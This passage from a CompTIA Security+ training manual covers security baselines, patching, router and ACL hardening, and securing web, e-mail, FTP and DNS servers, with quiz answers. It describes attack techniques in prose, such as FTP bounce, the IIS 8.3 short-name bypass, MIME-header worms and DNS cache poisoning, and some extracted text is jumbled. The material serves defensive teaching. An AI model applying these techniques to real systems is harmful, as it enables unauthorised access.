Security baselines 4 Under Snap-in, select


Security Templates

139

Click Add 5 Click Close 6 Click OK 7 Expand Security Templates 8 Expand C:\Windows\Security\Templates 9 Right-click C:\Windows\Security\Templates Choose New Template 10 Enter My Template Leave the description blank Click OK 11 Select and then expand My
Template From the shortcut menu. For the template name.

12 Select and then right-click


Restricted Groups

To display the shortcut menu.

Choose Add group 13 Type Administrators

To open the Add Group dialog box. To specify the group object.

14 Click OK twice 15 Select and then right-click


Registry To display the shortcut menu.

Choose Add Key

1310 CompTIA Security+ Certification


16 Under Registry, select
MACHINE

17 Click OK 18 Remove the CREATOR OWNER and SYSTEM groups

Click OK 19 Click OK
To Configure this key then Propagate inheritable permissions to all subkeys.

20 Close the Console1 Window 21 Save the Console with the name
My Console

22 Click Yes

To save the Security template.

Security baselines

1311

Installing and configuring file encryption capabilities


Explanation File encryption features, supported by certain operating systems, are useful if the operating systems access controls are not adequate to maintain the confidentiality of file contents. Certain operating systems do not support access control lists; this might make it necessary to deploy file encryption features. Encryption is a very resourceconsuming feature; therefore, the benefits of using it should be carefully weighed against the risks of not using it.

Updates, patches, and service packs


Due to the complexity of operating systems, security-related problems are often identified only after the OS has been released. Furthermore, it takes even more time for consumers to become aware of the problem, obtain the necessary patches, and install them on their systems. This gap gives potential intruders an opportunity to exploit the discovered security breach and launch related attacks on the system. To contain such risks, system administrators should keep track of security-related announcements that may apply to their systems. Depending on how critical the exposure is, the administrator may choose to disable the affected software until a solution (patch) can be applied to address the risk. Permanent fixes from vendors should be applied as they are made available. The following sections describe a systematic approach for addressing such issues. Establish procedures for monitoring security-related information Subscribing to mailing lists can enable administrators to receive important securityrelated announcements and to keep up with new developments and updates specific to their systems. There are also certain security-related sites, such as CERT or SANS, that educate users on industry best practices for security-related issues. Administrators may also seek out and monitor more discreet hacker sites, where exploits may appear prior to posting on a vendor site. Evaluate updates for applicability Certain software updates may not be applicable to a given systems configuration or to an organizations security requirements. System administrators should evaluate all the updates to determine their applicability to a given systems configuration before actually applying them to their systems. An up-to-date paper log of each system can help you quickly determine the applicability of a patch. Tests should be conducted in a lab environment to assess the effect of an update on a systems configuration. Plan the installation of applicable updates or patches The installation of an update or patch can itself cause security problems unless administered systematically based on a predefined plan. An inappropriately scheduled update might make information resources unavailable when needed by the system members. Furthermore, if an update must be performed on a large network, updates can lead to different and potentially incompatible versions of software on different parts of the network; this situation could cause information loss or corruption. The system might temporarily be placed in a more vulnerable state.

1312 CompTIA Security+ Certification


Updates can also cause problems in other installed software within the system; therefore, an update should be tested thoroughly in a test environment before being applied to production systems. If an update must be done on a live system, then schedule it during a period of light load, and ensure that sufficiently skilled personnel are available to back up critical files, to update and test the system, and to return the system to the original configuration if problems occur. Methods of updating a system depend on the topology of a system. System administrators can manually update small systems with a limited number of computers and workstations. However, depending on how big the network is, administrators may need to employ automated tools to apply software updates to a large number of computers. Updates that are conducted in an unsystematic and haphazard way could introduce new vulnerabilities to networks. Install updates using a documented plan In this step, system administrators follow a documented plan to apply the necessary software updates, using some or all of the tactics described in the previous section. The update plan as well as the necessary back-out procedures should be documented before the system is updated. Deploy new systems with the latest software Its important to make sure that new installations are compatible with planned upgrades. The hard log should include a list of updates installed on existing systems, and the administrator should keep an archive of required files, so that the new systems can be deployed with the most updated software. Its also recommended that system administrators install the most up-to-date driver software for all applications and system components. Those drivers typically address performance and security issues and are made available to the public as problems are discovered and resolved.

Security baselines Do it!

1313

A-4:

Discussing file system security

Questions and answers


1 Which of the following is not required for securing file systems? A B C
D

Create the necessary user groups. Configure access controls. Configure file encryption. Avoid drive partitions.

2 System administrators should disable ___________ permissions for all executable files and binary files.
Write/Execute

3 Which of the following are privileges that can be set on an object? A B C


D

Read Write Execute All of the above

4 When youre setting file system permissions, individual user accounts should be assigned access whenever possible. True or false?
False. The principle of least privilege should be applied.

5 Which of the following are common practices for setting file and data privileges? A B C Restrict access of operating system source files, configuration files, and their directories to authorized system administrators. Establish all log files as append only if that option is available. Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources. Pay attention to access control inheritance when defining categories of files and users. All of the above.

D
E

1314 CompTIA Security+ Certification

Topic B: Network hardening


This topic covers the following CompTIA Security+ exam objectives:
# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts Vulnerabilities 8.3 Naming Conventions 3.5 Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system Network Hardening Updates (Firmware) Configuration Enabling and Disabling Services and Protocols Access Control Lists

Handling global network access


Explanation E-commerce and advances in information communications require todays networks to be globally accessible, thereby posing new challenges for security auditors. Businesses must let customers and trading partners into the network; the trade-off, unfortunately, is that such network designs are also very attractive for hackers and cyber-terrorists. Using malicious tools available on the Internet, attackers can penetrate a network, take control of routers and switches, obtain or destroy confidential information, and embed viruses, Trojans, or backdoors into critical business applications. Networks are also susceptible to outages that can have a negative impact on customer and trading partner relationships. Business continuity is an essential ingredient in any e-commerce environment. Its therefore crucial to have a network with availability as well as with adequate security.

Firmware updates
Generally speaking, firmware is programming that is inserted into erasable programmable read-only memory (erasable programmable ROM), thus becoming a permanent part of a computing device. Samples of firmware are the PC system BIOS and router and switch boot code. Firmware is created and tested like software (using micro code simulation). Firmware updates can be made available by the vendors as vulnerabilities and malfunctions are discovered within previous versions. When ready, such updates can be distributed like other software and, using a special user interface, installed in the programmable readonly memory by the user. Administrators should keep track of vendor announcements to determine if they apply to their systems, and upgrade firmware on their network devices as suggested by vendors.

Security baselines

1315

Network configuration
Networks typically facilitate data transmission by a process called routing. Routing is the process of deciding the disposition of each packet that a router receives, and then either forwarding or discarding the data packet. Routers store destination addresses in a data structure called the routing table. It can dynamically update its address base through interactions with other routers. The routing mechanism decides whether to forward or discard a packet by using the destination IP address in the packet header. Routing functions and supporting structures are designed to route packets efficiently and reliably, not securely. Therefore, a routing process should not be used to implement security policy. Rather, firewall systems should govern security of information flow into and out of the network. Most firewall systems routing configurations are static, and hence less receptive to attacks. Assigning network addresses for interfaces on a firewall device Each network to which a firewall device is attached has a procedure to obtain new IP addresses. For the Internet, IP addressing is typically obtained from the Internet service provider (ISP) that connects to the firewall. For internal networks, including configured demilitarized zone (DMZ) networks, administrators can obtain IP addresses from within the organization. The IP addresses used internally typically come from the RFC 1918 IP address specification, which is not routable across the Internet without necessary translation. Establishing the routing configuration A firewall systems routing table contains a list of IP addresses for which the firewall system provides routing services. The routing decision is made based on the destination network address of the data packet being processed by the firewall. If the destination address exists in the routing table, the table provides the address of the next hop. If there is no next hop associated with the destination, the packet is discarded. An Internet Control Message Protocol (ICMP) unreachable message, indicating that the packet was undeliverable, may be returned to the source. When youre replacing an existing firewall system, its important to understand the network topology described by the routing configuration. The routing configuration of the new firewall system must be consistent with the current system. An organizations network security policy should require that the routing configuration of a firewall system be performed in an environment isolated from the production network. This policy should also specify what connectivity is to be permitted with the specific statements and deny all other connectivity. The routing configuration is derived from the network topology and should not be used to implement aspects of an organizations security policy. Some firewall designs implement a two-tier firewall architecture with a DMZ so that all inbound and outbound packets travel through both firewall systems. In these designs, the outside firewall is typically configured with more general packet-filtering rules. As packets move toward the internal network, filtering rules become more specific and complex.

1316 CompTIA Security+ Certification


Best practices for routers and firewalls Following are common best practices that should be taken into account when youre configuring router and firewall systems: Its very important to keep a copy of the current configurations of the network devices at a safe location on your network. Attacks, power outages, and configuration changes that may produce unexpected results might necessitate configuration backups. Never allow IP-directed broadcasts through the system. Smurf attacks may exploit this vulnerability. Configure devices with meaningful host names to make it easy to troubleshoot problems within the network. IP addresses without names prolong troubleshooting efforts, causing inefficient utilization of resources and time. Because not all software can handle uppercase correctly, lowercase naming conventions scale better. Always use a description for each interface. Its a good practice to use the circuit number as part of the description for wide area network (WAN) links. Always specify bandwidth on the interfaces even if its not needed. Certain routing protocols use bandwidth information to calculate the routing metrics when building their routing tables. Always configure a loopback address. Because the loopback interface is a logical interface, depending on the topology of the network, you can still access a device using a loopback interface regardless of the status of the primary physical interface. The use of a logical interface could also provide redundant paths to conduct Simple Network Management Protocol (SNMP) polling. A stable interface is very important for protocols such as Systems Network Architecture (SNA), which is very sensitive to time delays and outages. Despite its benefits in managing a network, SNMP can be very dangerous if not handled with proper care. An SNMP agent together with a set of SNMP application entities is known as an SNMP community. SNMP has two types of communities: Read Only and Read/Write. If the associated password is compromised, hackers can exploit the Read/Write community to execute unauthorized configuration changes. Avoid using common words for password and naming schemes. Dictionarybased password crackers can be used by malicious users to take advantage of such practices. Using tools such as SYSLOG, deploy logging throughout your network to collect information about interface status, events, and debugging and to place that information on a central logging server. Even if a hacker were able to modify the logs of a compromised system, he or she would then also need to break into the SYSLOG server to get that copy. Restrict data traffic to required ports and protocols only.

Security baselines

1317

Access control lists


An access control list (ACL) is a set of statements that controls the flow of packets through a device based on certain parameters and information contained within a packet. An ACL implements a certain type of security policy for an organization. For instance, if an organization doesnt want employees to use FTP across the Internet, the organization can institute a restriction by placing an access list on the corresponding interface. The access list would then enable the implementation of this policy. An access control list should not be considered a policy by itself. ACLs implement packet filtering. Packet filtering is the process of deciding the disposition of each packet that can possibly pass through a router. IP filtering provides the basic protection mechanism for a routing firewall device through inspection of packet contents. This process governs what traffic passes through the device, thereby potentially limiting access to each of the networks controlled by the firewall. The determination of such filtering rules and their placement within the network can be complex depending on the topology of the network. For a router that implements packet filtering, the routing process might have multiple points where ACLs are applied. Inbound data packets are typically inspected on arrival at the filtering device. Departing packets, on the other hand, are usually subject to filtering rules immediately before a packet is transmitted out of the device. Different rule sets might be used at each point where filtering is applied. If certain components of the organizations security policy cannot be implemented via ACLs, administrators should evaluate additional security tools, such as intrusion detection devices or proxies. Packet-filtering rules, implemented by ACLs, can be designed based on intrinsic or extrinsic information pertaining to a data packet. Intrinsic information is contained within the packet itself, such as source address, destination address, protocol, source port, destination port, packet length, and packet payload, which is the actual data. Extrinsic information exists outside of a data packet. This information can include the arrival/departure interface on the device, the context maintained by the firewall software that pertains to a packet, and the date and time of packet arrival or departure. In general, packet filters cannot reference extrinsic information. ACLs are generally designed to implement separate sets of rules for different interfaces, sometimes with separate sets for arriving and departing packets. By placing a given rule in the appropriate interfaces rule set, you are using extrinsic information in the rules design. Following are well-known best practices for designing filtering rules for new networks: ACLs typically implement implicit denials at the end of a rule set. When applied on an interface, an implicit denial causes all packets to be denied unless there are explicit permissions. Its a good practice to explicitly add the deny all rule to articulate the security policy of the organization more completely. Design antispoofing rules, and place them at the top of the ACL. Identify protocols, ports, and source and destination addresses that need to be serviced in your network. Make sure these requirements abide by your organizations security policy. Configure the filtering rule set of the ACL by protocol and by port. Collapse the matching protocols rows and the consecutive ports rows together into one new row that specifies a range. This reduces the number of rules, hence increasing processing efficiency. Place all permission rules between the antispoofing rules and the deny all rule at the end of the rule set.

1318 CompTIA Security+ Certification


Do it!

B-1:

Discussing network hardening

Questions and answers


1 ____________ is a logical interface that is not tied to any physical interface.
Loopback

2 ____________ is a function of IP routing that allows the packet originator to influence routing decisions as the packet traverses networks.
Source routing

3 Smurf attacks can be thwarted by disallowing ____________ ____________ on routers.


IP-directed broadcasts

4 For best security on routers, never configure a loopback address. True or false?
False. Always configure a loopback address. The loopback interface allows you to access a device regardless of the status of the primary physical interface.

5 The SNMP ____________ community string can be used to make changes in a router configuration.
Read/Write

6 SNMP has two types of communities. Identify them from the list provided. A
B

Router Access Only Read Only Random Access Only Read/Write

C
D

7 ____________ is a useful feature to allow TCP data packets into your internal network, given that the data traffic is initiated from your internal network.
Filtering

Security baselines

1319

Disabling services and protocols


Explanation Many services are vulnerable to Internet-based attacks, which have caused nightmares for system administrators over the years. To support novice administrators, many server operating systems are now packaged with a variety of software and installers, which start these services automatically. Every service should be evaluated for need and risks. Any services that are unnecessary should be removed. Those that are required should be evaluated and installed in a way that lowers potential risks. As a system administrator, you must become familiar with such services and take appropriate precautions to mitigate the risks associated with them. RPC Remote Procedure Call (RPC) is one of the most commonly exploited services on the Internet today. RPC essentially permits a computer to execute a program on another computer. RPC Portmapper, used to launch reconnaissance attacks, returns information about all RPC network services configured to run on your host systems. When a distributed application requires RPC service, it should be allowed only through secure access methods such as VPN. Otherwise, RPC services should be disabled by blocking access on corresponding ports on the Internet border routers. Network File System (NFS), the UNIX-based file-sharing mechanism, is also vulnerable to such attacks and therefore should be blocked from the Internet. Web services Like RPC, Web services are also commonly exploited by Internet-based attacks. However, unlike with RPC, most companies need to permit the HTTP protocol for access to hosted Web services. Most of the risk associated with servicing Web traffic results from either the deployment of outdated Web servers or the use of third-party applications with documented vulnerabilities. System administrators can prevent such vulnerabilities with proper research and configuration. SMTP, SNMP, and FTP Simple Mail Transfer Protocol (SMTP), Simple Network Management Protocol (SNMP), and FTP services provide avenues for most of the remaining Internet-based attacks. SMTP is the industry-standard protocol used for electronic mail. Most SMTPspecific vulnerabilities result from unapplied or misapplied patches related to Sendmail installations or misconfigured Sendmail daemons. SNMP protocol is used for remote management of devices across a network. There is usually no reason to allow network management from the Internet. If system administrators must have remote network management capability, its suggested that SNMP be accomplished via VPN access. Anonymous FTP service allows anyone from the Internet to access internal FTP servers, either to upload or download data. Such practices should be disallowed unless there is a critical business need. Denial-of-service (DoS) attacks are commonly executed on systems that lack necessary configuration parameters. Such attacks have caused tremendous financial damage to many companies; the damage ranges from loss of business to even bankruptcy in certain cases. While its difficult to completely forestall any denial-of-service attack, carefully configuring your Internet devices can minimize the likelihood of being a target.

1320 CompTIA Security+ Certification


The most common reason for successful DoS attacks is the presence of unnecessary services running on network devices. For instance, Bootstrap Protocol, a service used to distribute IP addresses to clients, is almost never needed and should be disabled on all devices. Also, vulnerabilities associated with certain services can be fixed with patches provided by vendors. Certain FTP servers suffer from a buffer overflow vulnerability that can be easily fixed with patches. Administrators should disable all services that are not needed for Internet-based operations. Furthermore, services, such as DNS, that are necessary for Internet connectivity, should be properly reviewed, configured, and monitored. Internet Information Service (IIS) Microsoft IIS 4.0 and earlier has a security hole related to web files that dont use the DOS 8.3 naming convention. Files stored using the long file name convention can be accessed even if theyre restricted via IP address or through the use of SSL by simply requesting the file in DOS 8.3 format. For example, if a file is named MyConfidentialFile.htm, then a hacker can request MyConf~1.htm and be granted access to the file. This security hole has been fixed in IIS versions above 4.0. Do it!

B-2:

Managing services and protocols with Windows Server 2003 security templates Heres why
To apply a Windows Server 2003 security template and evaluate the results. Microsoft offers security templates at three primary levels: basic, secure, and high secure. The issues surrounding the use of these templates are unknown. Because the administrator is relying on Microsoft to secure the server, the settings are difficult to track.

Heres how
1 Choose Start, Run

2 Type mmc and press e 3 Choose File, My Console.msc


To open the previously created mmc console.

4 Choose File, Add/Remove Snap-in 5 Click Add 6 Select Security


Configuration and Analysis Under Snap-in.

7 Click Add Click Close 8 Click OK 9 Select and then right-click


Security Configuration and Analysis To display the shortcut menu.

Security baselines 10 Choose Open database


To open the Open database dialog box.

1321

11 In the File name box, enter My Database Click Open 12 Select the securedc.inf template Click Open 13 Right-click Security
Configuration and Analysis To import the template.

Choose Configure Computer Now Click OK 14 Right-click Security


Configuration and Analysis To use My Database.log as the log file.

Choose Analyze Computer Now Click OK 15 Right-click Security


Configuration and Analysis To use the My Database.log file.

Choose View Log File

Youll see a screen similar to the one below.

16 Explore the log file 17 Close My Console and save the changes 18 Close all other open windows

To see the changes made.

1322 CompTIA Security+ Certification


Do it!

B-3:

Reviewing services and protocols

Questions and answers


1 What is the best practice for securing RPC services?
If a distributed application requires RPC, allow RPC only through secure access methods such as VPN. Otherwise, disable RPC by blocking access on corresponding ports on the Internet border routers.

2 Which of the following actions are safeguards against DoS attacks targeting services and protocols? A B C D
E

Disable services that are not needed for Internet-based operations. Review, configure, and monitor services that are necessary for Internet connectivity. Apply software patches to fix known vulnerabilities. Block access on corresponding ports on the Internet border routers. All of the above.

3 Most SMTP- and FTP-specific vulnerabilities stem from sloppy configuration and unapplied or misapplied patches. True or false?
True

Security baselines

1323

Topic C: Application hardening


This topic covers the following CompTIA Security+ exam objectives
# 3.5 Objective Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system Application Hardening Updates (Hotfixes, Service Packs, Patches) Web Servers E-mail Servers FTP (File Transfer Protocol) Servers DNS (Domain Name Service) Servers NNTP (Network News Transfer Protocol) Servers File / Print Servers DHCP (Dynamic Host Configuration Protocol) Servers Data Repositories Directory Services Databases

Updates, hot fixes, service packs, and patches


Explanation Applications that reside on networks must be hardened against intruder attacks. Many programs have security features built in to protect the resident computer against attack. In like fashion, servers and other network devices can be hardened against attack. As with operating systems and network operating systems, application updates, hot fixes, service packs, and patches require careful planning and testing prior to implementation. Updates are enhancements to the application, such as new features or functionality. Hotfixes are fixes to bugs that are discovered after a new application or version is released. Hot fixes typically replace specific files in the application with revised versions. Patches are temporary or quick fixes to the program. Patches are generally used to fix compatibility and minor operation issues and interface problems. Service packs are collections of hot fixes and patches bundled together and provided at fairly regular intervals. To protect your network from bugs or security vulnerabilities, upgrade all application software to the latest versions, and install the latest service packs and security patches. Vendors typically announce new version releases and patches on their Web sites or through e-mail notices. Remember to test these updates on non-production equipment before implementing them in a live production environment.

1324 CompTIA Security+ Certification Web servers


There are more attacks and vulnerabilities associated with Web servers than there are for any other type of server. The problem stems from the fact that a Web server is designed to make information accessible, rather than to protect it. Software companies only add to the problem by creating default installations that turn on unneeded services, rather than enabling only the basic services and forcing administrators to turn services on as needed. With that in mind, this section briefly discusses some high-level best practices for securing Web servers. Isolating a Web server on a DMZ A public Web server host is a computer intended for public access. This means that information stored on a Web server can be accessed by many people from locations all over the world. Regardless of how well the host computer and its application software are configured, there is always the chance that someone will discover a new vulnerability, exploit it, and gain unauthorized access to the Web server host. If this occurs, administrators need to prevent the following subsequent events: The intruder is able to observe or capture network traffic that is flowing between internal hosts. Such traffic might include authentication information, proprietary business information, personnel data, and many other kinds of sensitive data. The intruder is able to access internal hosts or to obtain detailed information about the system and its components. To guard against such threats, the public Web server host must be isolated from your internal network and its traffic. An example is shown in Exhibit 13-2.

Exhibit 13-2: Isolating a Web server on a DMZ Configuring a Web server for access privileges Most operating systems for Web server hosts can be configured for access privileges for files, devices, and other data or code objects stored on a host. Any information that your Web server can access by using these controls can potentially be distributed to all users accessing the public Web site. The Web server software is likely to provide additional object, device, and file access controls specific to its operation. Taking the following two perspectives, administrators need to consider how best to configure access controls to protect information stored on the same hardware as your public Web server: To limit the access to the Web server software To apply access controls specific to the Web server where more detailed levels of access control are required Properly configured access controls can prevent the disclosure of sensitive or restricted information that is not intended for public dissemination. In addition, access controls can limit resource use in the event of a DoS attack against your public Web site.

Security baselines Identifying and enabling Web-server-specific logging tools

1325

Logging can help administrators identify the sources of attacks as well as other problems and can help indicate the appropriate actions to take to prevent such events from reoccurring. On many servers, the Web service is among the most active and accessible. Considering security implications A Web server listens for a request and responds by transmitting the specified file to the requestor. The Web server might invoke additional mechanisms to execute programs or to process user-supplied data, producing customized information in response to a request. Examples of these mechanisms include Common Gateway Interface (CGI) scripts and server plug-ins. For example, CGI scripts can be used to interface with search engines and databases, create dynamic Web pages, and respond to user input. Because these features allow outsiders to upload data to the server, administrators need to assess the security risks and implications before applying such components. Configuring authentication and encryption The public Web server may need to support a range of technologies for identifying and authenticating users who may have different privileges for accessing information. Some of these technologies are based on encryption technology, providing a secure channel between a Web browser client and a Web server. Examples of such tools include Secure Sockets Layer (SSL), Secure Hypertext Transport Protocol (S-HTTP), and Secure Electronic Transaction (SET). Before placing any sensitive or restricted information on a public Web server, administrators need to determine the specific security and protection requirements and confirm that the available technologies can meet these requirements.

E-mail servers
E-mail is arguably considered the most important service to protect, considering its overall impact on the operations of any given organization. Companies often have e-mail from the Internet directly entering their e-mail servers for delivery to internal users. There are serious risks associated with the ability to receive e-mail from the outside world. The widespread adoption of e-mail through the years has been accompanied by the development of malicious code such as e-mail viruses and attacks. E-mail has enabled attackers to distribute harmful content to the internal network. An attacker can easily circumvent the protection offered by a firewall by tunneling through the e-mail protocol because a typical firewall does not inspect e-mail and its contents. Attachments with malicious contents In such attacks, the attacker typically tries to get the user to activate an attachment to execute its malicious contents. Although system administrators are commonly blocking files with certain extensions, attackers can overcome such precautions by renaming extensions (such as renaming an .exe extension as .bat). Furthermore, such malicious attacks could try to take advantage of the trust relationship between users, whereby, if a user activates an attachment, the attachment could trigger the sending of malicious code to other colleagues in the victims address book. Worms, such as AnnaKournikova and Melissa, take advantage of such capabilities.

1326 CompTIA Security+ Certification


E-mails with abnormal MIME headers MIME headers contain information about an e-mail message, such as the subject line, date, or file name. The Nimda virus is a commonly known virus that exploits the vulnerability caused by distorted MIME headers. This exploitation uses a malformed MIME header, which tells Outlook Express that the attached infectious file is a WAV file. This allows the worm to be executed automatically. Because there is no need for the user to explicitly activate the attachment, when the Nimda virus was first released, it caused extensive damage to corporations all over the globe. Also, certain vulnerabilities associated with Outlook Expresss date and file-name fields enable attackers to embed malicious code in such headers in an attempt to execute buffer overflow attacks on the victim system. Scripts embedded into HTML-enabled mail The use of HTML mail enables attackers to embed malicious HTML script and JavaScript code within the e-mail, which is then activated as soon as the e-mail is opened. Because such attacks do not use explicit attachments, they are hard to detect with conventional file-checking mechanisms. Such vulnerabilities can be exploited by e-mail to attack corporate resources, inject dangerous worms, and enable the execution of system functions such as reading, writing, and deleting files. Countermeasures The following defense mechanisms can help administrators protect systems against the aforementioned vulnerabilities: The first defense against such e-mail attacks, as in all other attacks, is to make sure that the e-mail server has the latest software updates and patches. One of the best practices for corporate e-mail connectivity is to deploy a dedicated e-mail relay (gateway) server, which sits in a protected area (DMZ), between the internal network and the Internet. The e-mail content-filtering mechanisms available in many e-mail gateway products allow a security administrator to create rules to search for key words and phrases and specific types of file attachments. Deployment of virus-scanning tools on the server can prevent viruses from making their way to the desktops. Although new viruses are engineered on an almost daily basis, virus programs with automatically updated signature files can be very effective against such threats. Administrators can also take advantage of attachment-checking mechanisms on the server. Such tools can be activated on the server to block suspicious file types that might contain malicious contents. Examples of such files are .exe or .vbs files. HTML Active Content removal is another defense mechanism that can filter emails with HTML tags and attributes that are used to execute malicious code.

Security baselines

1327

FTP servers
File Transfer Protocol (FTP) is used to transfer files between a workstation and an FTP server. When ftp appears in a URL, it means that the user is connecting to a file server to either upload or download a file. Most FTP servers require the user to log on to the server to transfer files. The original specification for FTP contains a number of mechanisms that can be used to compromise network security. The following sections list the vulnerabilities associated with FTP. Protecting against bouncebacks FTP, as specified in the RFC standard 959, presents a security breach for attacking wellknown network services on a remote server by using the FTP service on a third-party server. The attack involves sending an FTP PORT command to an FTP server containing the network address and the port number of the server or service being attacked. The attacker can instruct the FTP server to send a file to the service being attacked on the victim system. Such a file may contain commands relevant to the service being attacked (such as SMTP). Using the FTP server to connect to the service on the attacked machine, rather than connecting directly, makes tracking down the attacker difficult. For instance, a client uploads a file containing SMTP commands to an FTP server. Then, using an appropriate PORT command, the client instructs the server to open a connection to the attacked servers SMTP port and upload the file containing SMTP commands to the victim machine. This may allow the client to forge mail on the third machine without making a direct connection; this makes it difficult to track the attacker. TCP port numbers in the range 0 to 1023 are reserved for well-known services such as mail, Telnet, and FTP control connections. The original FTP specification makes no restrictions on the TCP port number used for the data connection. Therefore, using the proxy FTP scenario described here, attackers can instruct an FTP server to attack a wellknown service on the victim machine. To prevent such attacks, administrators should configure their servers not to open data connections to TCP ports lower than 1024. A server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type 504 (Command not implemented for that parameter). Disabling the PORT command and using proper file protections to prevent attackers from executing unauthorized transfer of files are other solutions for preventing bounceback attacks. However, disabling the PORT command also prevents proxy FTP, which may be required in certain situations. Restricting areas System administrators may want to restrict access to FTP servers that store confidential or corporate data. These restrictions could be set based on the network address of the client making the file transfer request. In such cases, before allowing the transfer of restricted files, the server should confirm that the network address of the client making the request on both the control connection and the data connection is within the organizations address space. Checking the address range for both the control and data connections protects the server from situations in which the server establishes a control connection with a trusted host but the data connection is misdirected. Using network addresses to establish FTP control and data connections leaves the FTP server vulnerable to IP spoofing attacks. In such cases, the attacker could assume a trusted IP address to download restricted files. Using strong authentication mechanisms can prevent such risks.

1328 CompTIA Security+ Certification


Protecting user names and passwords The standard FTP specification sends passwords in clear text by using the PASS command. FTP clients and servers should utilize alternate authentication mechanisms to avoid attempts to intercept clear-text passwords. To minimize the risk of brute-force password guessing, system administrators should configure FTP servers to limit the number of allowed attempts for a legitimate password. The server should terminate the control connection with the client after a certain number of attempts. In addition, to diminish the efficiency of a brute-force attack, system administrators should configure FTP servers to impose a five-second delay before replying to an invalid PASS command. An intruder may attempt to initiate multiple concurrent control connections to an FTP server to overcome such mechanisms. To be protected from this, the server can be configured either to limit the total possible number of control connections or to try to detect suspicious activity across sessions and refuse further connections from the site. Furthermore, standard FTP specifications specify an error response to the USER command when the user name is rejected. If the user name is valid and a password is required, FTP returns a different response. To prevent a malicious client from determining valid user names through persistent attempts, its suggested that FTP servers be configured to return the same response to the USER command, prompting for a password and then rejecting the combination of user name and password for an invalid user name. Port stealing Most operating systems assign dynamic port numbers in increasing order. By observing port assignments, an attacker can predict the next port to be used by the server. The attacker can make a connection to this port, preventing another legitimate client from making a transfer. Also using this method, the attacker can steal a file meant for a legitimate user or insert forged data into a stream thought to come from an authenticated client. System administrators can prevent these problems by configuring the server OS to deploy random port assignment algorithms. Other documented vulnerabilities The anonymous FTP feature allows clients to connect to an FTP server with minimum authentication, and remote command execution allows clients to execute arbitrary commands on the server. Such services should not be deployed unless there is a legitimate business need.

Security baselines Do it!

1329

C-1:

Discussing Web, e-mail, and FTP server security

Questions and answers


1 Some of the Web server security options that should be exercised before deploying the server include:
A B C D E

Use file-system access controls on server files and directories that are not for public viewing. Use Web server logging. Verify the safety of any types of CGI scripts and plug-ins that are executed on the Web server. Isolate the Web server on a DMZ. Use authentication and encryption technologies as necessary, including SSL and S-HTTP.

2 List some of the ways attackers can affect networks or hosts with e-mail.
Attacks can be launched by using attachments that contain viruses or other malicious code, by using abnormal MIME headers, or by using malicious scripts embedded in HTML e-mail.

3 The anonymous FTP feature allows clients to connect to an FTP server with minimum authentication. True or false?
True

4 An attack by which the attacker uses a third-party FTP server to connect to a service on the victim machine, rather than connecting directly, is known as ___________.
bounceback

5 An FTP server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type ___________.
504

1330 CompTIA Security+ Certification DNS servers


Explanation Computers translate names into IP addresses in a process transparent to the end user. This process relies on a system of servers collectively known as the Domain Name Service (DNS). DNS stores data linking domain names with IP addresses. Each domain name server stores a limited set of names and numbers. All domain name servers are linked by a series of 13 root servers that coordinate the data and allow users to find the server that identifies the site they want to reach. One of the root servers, designated the master root, maintains the master copy of the coordination file, called the root zone file. The other 12 servers maintain copies of the file provided by the authoritative root server and make the file available to the rest of the domain name servers. The domain name servers are organized into a hierarchy that parallels the organization of the domain names. Specifically, the 13 root servers maintain authoritative information about the top-level domains (TLDs). In turn, each TLD provides authoritative domain name information for the second-level domains in its zone, while those second-level domains provide domain name services for resources in their zones. DNS is a very common target for attackers across the Internet. The following sections discuss some documented vulnerabilities associated with DNS. Inaccurate data on IP address ownership Without accurate information on the ownership of IP addresses, it becomes difficult to separate attackers from innocent users. Although the DNS data on recently assigned addresses is considered accurate, data on older blocks is often outdated. Furthermore, suballocations of IP blocks are often not tracked; this can delay identifying and contacting the source of a problem. For instance, for a company such as IBM, which owns a Class A IP address space, it could take days to find out the source of a packet flood from a suballocated IP address space within the organization. Including contact information for suballocations in the Internet Assigned Numbers Authority (IANA) database would speed this process up. Regional address registries, ISPs, and DNS server operators should update information as often as possible to avoid such problems. Customer registry communication An attacker could potentially initiate a forged request to change the information on a domain name, resulting in traffic destined to that name being routed to a bogus address. The misdirected traffic would then allow the attacker to collect personal or confidential information, such as credit card numbers, or cause users to download viruses or Trojan horse software. The use of secure encrypted communication in this process could reduce this risk. DNS spoofing and cache poisoning Another common security threat within the DNS is spoofing, which occurs when someone intercepts a query to a domain name server and replies with bogus information, resulting in a misdirection of the user. When the domain name server maintains a record of the bogus destination and uses it to answer later queries, this process is known as cache poisoning. An example is shown in Exhibit 13-3.

Security baselines

1331

Exhibit 13-3: DNS servers Many DNS servers are vulnerable to DNS spoof attacks. For instance, servers that use obsolete versions of BIND, the most common DNS software, are good examples. Its estimated that roughly 12% of DNS servers use versions of BIND that makes them targets for DNS spoof and buffer overflow attacks. Upgrading DNS servers with more current versions of BIND can mitigate such risks. Outdated root.hints file The root.hints file allows a given DNS server to locate the 13 root servers by address. Although its very uncommon, the addresses of these root servers sometimes change. Users who do not keep their root.hints file updated can send queries to addresses that no longer host root servers.

1332 CompTIA Security+ Certification


Recursive queries Configuring servers to perform recursive queries also increases the risk of spoofing. In a recursive query, when a client queries a domain name server and the server cannot answer that query from its cache, the server queries one or more servers up the DNS tree and forwards the answer to the client, rather than handing off the query to the other servers. Exhibit 13-4 illustrates the Quick Time screen that allows the user to decide which files can be downloaded and when.

Exhibit 13-4: Deciding which files to download Each packet used in a recursive query includes a tracking number. Hackers monitoring a domain name server can predict the next tracking number in a sequence and send a packet with that number to spoof the response from a legitimate name server. DNS server administrators can mitigate such risks by making sure they have the most updated versions of BIND. Denial-of-service attacks Like other Internet servers, DNS servers are also targeted by DoS attacks. Because of their importance, the root servers typically make a good target for DoS attacks. However, because of the critical role they play for the functioning of the Internet, the root servers are configured with the most secure software and configuration parameters, making it very hard for attackers to take advantage of them. Deployment of real-time monitoring tools enables administrators to identify and quickly block such malicious attempts.

Security baselines

1333

NNTP servers
